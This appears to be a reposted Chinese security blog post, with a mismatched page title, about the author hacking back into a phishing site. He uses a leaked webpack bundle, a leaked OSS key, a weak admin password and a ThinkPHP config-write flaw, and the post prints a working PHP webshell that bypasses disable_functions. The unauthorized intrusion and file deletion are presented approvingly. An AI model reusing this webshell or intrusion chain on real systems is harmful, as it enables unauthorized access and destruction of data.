@requestbody 穿过来的参数一定要和后台对像完全一致吗_小伙子,你要“耗子尾汁”...

这是 酒仙桥六号部队 的第 139 篇文章。

全文共计1681个字,预计阅读时长6分钟。

前言

在一个月黑风高的夜晚,我正在打游戏,突然微信像被轰炸一般,疯狂响起消息提示的声音,手机静音继续打游戏,没一会,电话响起来了,女朋友的打来的,一顿质问:“在干嘛,是不是不爱我了,游戏重要还是我重要!“

16d9769c75db6472d980743d472e75f8.png

了解了事情真相,原来她和她的几个同事被人钓鱼了,有的人还中招了。嘿!我这暴脾气,这能忍?搞他!先等我把这把游戏打完。

80bcd1e9aa662f92510f9bca9f4d6cc6.png

正传

言归正传,搞他,我倒要看看是什么站竟然能让他们这么多人都上当。访问看看,哟,还挺专业,https都用上了,看着还挺像那么回事,盘它。

b4ca708be8600b4c49d6415fda7c58c4.png

84f56e8a7cc4ba396beef76df94a14d3.png

直接爆破吗?太容易打草惊蛇,先找找看有什么信息能利用的。好家伙,有webpack泄露,让我来䁖䁖里边都有啥信息,把网站的webpack打包下载下来方便搜索查看。

816773c0c75459e5ad2b80b6db048b65.png

5db5a69e772d3843cd4da270fd1d04e5.png

真是神仙开发,竟然在代码里留下了硬编码的账号密码,登上去看看,不过话又说回来,幸好没选择直接爆破,要不然,这个密码,爆破一个甲子都不一定能爆破出来。登上后台,看看有什么功能。

7486c61ea278dc642ed8cb4ba077d515.png

2fedf7fed53fe666c6b0756d1844dd60.png

老子裤子都脱了,你给我看这个?我就不信这个邪,继续盘它。盯着这个泄露的webpack源码翻了半天,猜测是做钓鱼站的人从原网站上扒下来的这一套,又把代码改了改,后台功能只是个摆设,这个钓鱼站的作者的目的更多是想获取你的账号密码,要不然就是还有APP,获取你的隐私信息,不过这个钓鱼的成本就有点高了,大多数人都不会这么干,先继续看webpack代码吧,淦。

翻了半天,终于在代码里发现一个github地址,上去看看都有什么东西。

8cf217bc363b2c3dd82e12a473b1554f.png

2adc32331302ad4a9d96d4218be956ff.png

看样子是个写前端的,但是还不能确定是不是这个钓鱼站的作者,继续找找看。翻遍了这个人的所有项目,终于在一个项目中发现了一个泄露的OSS秘钥,这里我要安利一个工具了“Sourcegraph”,借助这个工具我们就可以不用下载github源码文件,直接在页面进行搜索了。

b444e564ef24e1b7bbf97db4dd2c31d6.png

bb5484b05be0f1dd454d07704cd9a4e7.png

我们连接这个OSS看看有什么东西。

76f4620665f42367ab99cad9191c55bc.png

这不就是那个钓鱼站的图片嘛,应该就是这个人了,在根目录下还有一个excel文件,下载看看是什么东西。

3cb48cc7ee66cc354d455ab1ad068d7c.png

9cd22da30a7a732327d16738c4973c8c.png

好家伙,记录了不少的手机号、邮箱和密码呀,看来是他没跑了,上传的时间还挺新,先给他删了,免得再祸害其他人。在根目录下还有个备份的压缩包,下载来看看备份的是什么。

2b1b3e07255bad15fdacb0072b33bb02.png

嚯,是代码,还是php的。

c48fa40bd446a920cd9ce6e6d844a35b.gif

先看看有没有和这个钓鱼站部署在一起,nmap扫起。

c9cd188f44af1756e1fbcd2e0e3d881e.png

Windows系统,还开了8080,访问看看。

8b298a23cbc7fd057fcd0de7dc8f8477.png

没错,是它,和我拿到的代码中后台的页面一模一样,盘它。先爆破一下后台看看,能进后台就舒服了,试了个admin/123456,卧槽?进来了,你怕不是在逗我,都省的爆破了,也不用在本地搭环境了,直接开审,用的thinkphp3的框架,先看看登录有没有问题吧。

fe187bd7c84e0c69237bc1aa20772429.png

在后台的一个SystemController中发现修改配置的地方能写入文件,而且写入的还是php后缀的文件,这下我只需要构造参数,能让他完整保存语句,webshell能正常执行就可以了,代码拉出来试试。

72cecdfd0422fb51f592626fde62d738.png

这里就直接构造一句话吧。

fb74047f1e2384fceea523ef43712b4b.png

提交之后访问写入的webshell。

55d3c084026ee62291aadfb6b8d561fd.png

卧槽?有disable_functions,既然你能让我写shell了,那我就绕你。构造请求实现下面这个webshell。

<?php $command=$_GET['a'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>

绕过了disable_functions能执行命令了,但是怎么都弹不回来shell,不过能执行命令了,也算成果吧,怎么说这权限也是管理员权限。

c06fd9ba9fd7ed5fb7b2c17030f42f32.png

找到80端口对应的进程id,先把你用来害人的东西都给你删掉。

1c1c1049e4305ada63a081083f277e3e.png

taskkill /pid 7576,再***见!再找到tomcat的目录,整个给你删掉,让你再祸害四方。

cf843f44d97e0d2cc4f04b971f5da5ac.png

ff03104d58e0235e19531769f860d4a4.png

这次彻底删除了,本着劝诫的心,在桌面给这个制作钓鱼站的人留下一句话。

82ed368c4f68acfd68c61517d69f8fa5.png

结语

授人以“鱼”不如授人以“娱”,多行不义,终究会被法网打捞上岸。

08267dc02f3de8428470ad703ff7869a.png

02d1c900895635e7c5fbfafaa6b082ae.png

92e6c796bce06ff2c9551b964cab5358.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值